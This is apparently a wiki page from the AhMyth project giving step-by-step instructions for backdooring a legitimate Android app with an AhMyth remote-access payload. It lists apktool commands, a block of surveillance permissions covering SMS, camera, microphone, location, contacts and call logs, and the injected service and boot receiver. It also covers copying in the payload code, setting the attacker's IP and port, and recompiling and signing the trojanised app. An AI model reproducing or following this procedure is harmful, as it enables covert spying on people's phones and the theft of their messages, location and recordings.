-
Notifications
You must be signed in to change notification settings - Fork 189
User Manual ‐ Manually Template Original Applications ‐ Boot Method
- Apktool
- A properly configured, decompiled AhMyth payload
- Patience
- Decompile the original application using Apktool.
apktool d original.apk
java -jar apktool.jar d original.apk
- Enter the decompiled application folder and open the AndroidManifest.xml file in an editor such as Visual Studio Code or Sublime.
- Copy the payload permissions from the "Payload Permissions" dropdown tab below, and inject them with the original application's existing permissions, then save the file. Follow the dropdown "Help" tab to view an example if you get stuck.
Payload Permissions
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.WRITE_SMS"/>
<uses-feature android:name="android.hardware.camera"/>
<uses-feature android:name="android.hardware.camera.autofocus"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_BACKGROUND_LOCATION"/>
<uses-permission android:name="android.permission.INSTALL_PACKAGE"/>
ℹ️ Help
Original Manifest Before Payload Permissions Injection
Original Manifest After Payload Permissions Injection
The Injected Payload Permissions are Highlighted in Red 🔴
- Copy the payload Service below, and inject it with the applications existing services, if there are no existing services in the original application's manifest then inject it before the closing
</application>
tag in the original application's manifest, then save the file. Follow the dropdown "Help" example for further help.
<service android:enabled="true" android:exported="false" android:name="ahmyth.mine.king.ahmyth.MainService"/>
ℹ️ Help
If the manifest contains existing services, then we're going to need to insert the payload service just after the original application's last existing service in the manifest like so:
Original Manifest With Existing Services, Before Payload Service Injection
Original Manifest With Existing Services, After Payload Injection
The Injected Payload Service is highlighted in Red 🔴 while the application's last existing Service is highlighted in Blue 🔵
If the manifest does not contain any existing services, then insert the payload service just before the closing </application>
tag in the manifest like so:
Original Manifest Without Existing Services, Before Payload Service Injection
Original Manifest Without Existing Services, After Payload Service Injection
The Injected Payload Service is Highlighted in Red 🔴 while the application's closing
</application>
tag is highlighted in Blue 🔵
- Copy the payload Receiver below, and inject it with the applications existing services, if there are no existing services in the original application's manifest then inject it both before the closing
</application>
tag but after the previously injected payload receiver, then save the file. Follow the dropdown "Help" example for further help.
<receiver android:enabled="true" android:exported="true" android:name="ahmyth.mine.king.ahmyth.MyReceiver">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED"/>
</intent-filter>
</receiver>
ℹ️ Help
If the original application's manifest contains existing receivers, then insert the payload receiver just after the application's last existing receiver like so:
Original Manifest With Existing Receivers, Before Payload Receiver Injection
Original Manifest With Existing Receivers, After Payload Receiver Injection
The Injected Payload Receiver is highlighted in Red 🔴 while the application's last existing receiver tag is highlighted in Blue 🔵 along with the previously injected payload Service which is highlighted in Green 🟢
If the manifest does not contain any existing receivers, then insert the payload receiver just before the closing </application>
tag in the manifest like so:
Original Manifest Without Existing Receivers, Before Payload Receiver Injection
Original Manifest Without Existing Receivers, After Payload Receiver Injection
The Injected Payload Receiver is highlighted in Red 🔴 while the closing
</application>
tag is highlighted in Blue 🔵 along with the previously injected payload Service which is highlighted in Green 🟢
- Head into the Decompiled APK folder of your AhMyth Payload and enter the
smali
directory.
- Copy the payload folders inside the
smali
directory, excluding theandroid
andandroidx
folders, these will be copied over later on.
- Head back into the decompiled original application we're backdooring, and create a new smali_classes(X) directory (where "(X)" refers to the directory's respective numbering), click to the dropdown tab below to see more information about creating smali_classes(X) directories appropriately.
ℹ️ Creating "smali_classes(X)" Directories Appropriately
Creating smali_classes(X) directories isn't as hard as it sounds.
If the decompiled original application contains only one smali directory, then this directory will always be titled "smali"
, in which case all we need to do is create a new "smali_classes2"
directory and paste our copied AhMyth payload folders in the newly created "smali_classes2"
directory.
Before
After
If the decompiled original application contains multiple smali directories, then that means that we have a list of smali_classes(X) folders on our hands, you'll notice these directories are numbered as well.
So in order to create our new payload directory, all we need to do is following the numbering of the directories, which simply means that we create a smali_classes(X) folder based on the numbering of the last existing smali_classes(X) folder, so for example if this last existing smali_classes(X) folder is numbered as smali_classes10
, then we simply create the directory smali_classes11
and so on, the new directory's numbering should always be 1 more than the last existing smali_classes(X) folder.
Before
After
- Paste the copied AhMyth payload folders into the newly created smali_classes(X) directory.
- Head back into the
smali
folder of your decompiled AhMyth Payload, and copy theandroid
&androidx
folders.
- Paste the copied
android
&androidx
folders, into thesmali
folder of the Decompiled original application and replace files if prompted.
- After copying and pasting the
android
andandroidx
folders over to thesmali
directory in the Decompiled original application, you'll want to then edit IP:PORT file titlede.smali
which is located atsmali_classesX/ahmyth/mine/king/ahmyth
(wheresmali_classesX
corresponds to the payload directory we created for storing AhMyth payload files previously) and apply your own IP address and Port number, once you've done this, save the file.
- Close everything, and recompile the backdoored application using Apktool.
apktool b original -o Ahmyth.apk
java -jar apktool.jar b original -o Ahmyth.apk
- Sign the backdoored application using an APK signer. We recommend Uber APK Signer as it not only signs the payload, but also takes care of zipaligning the payload before signing it as well.
java -jar sign.jar -a path/to/Ahmyth.apk -o ~/path/to/output/folder
java -jar sign.jar -a path/to/folder/containing/the/payload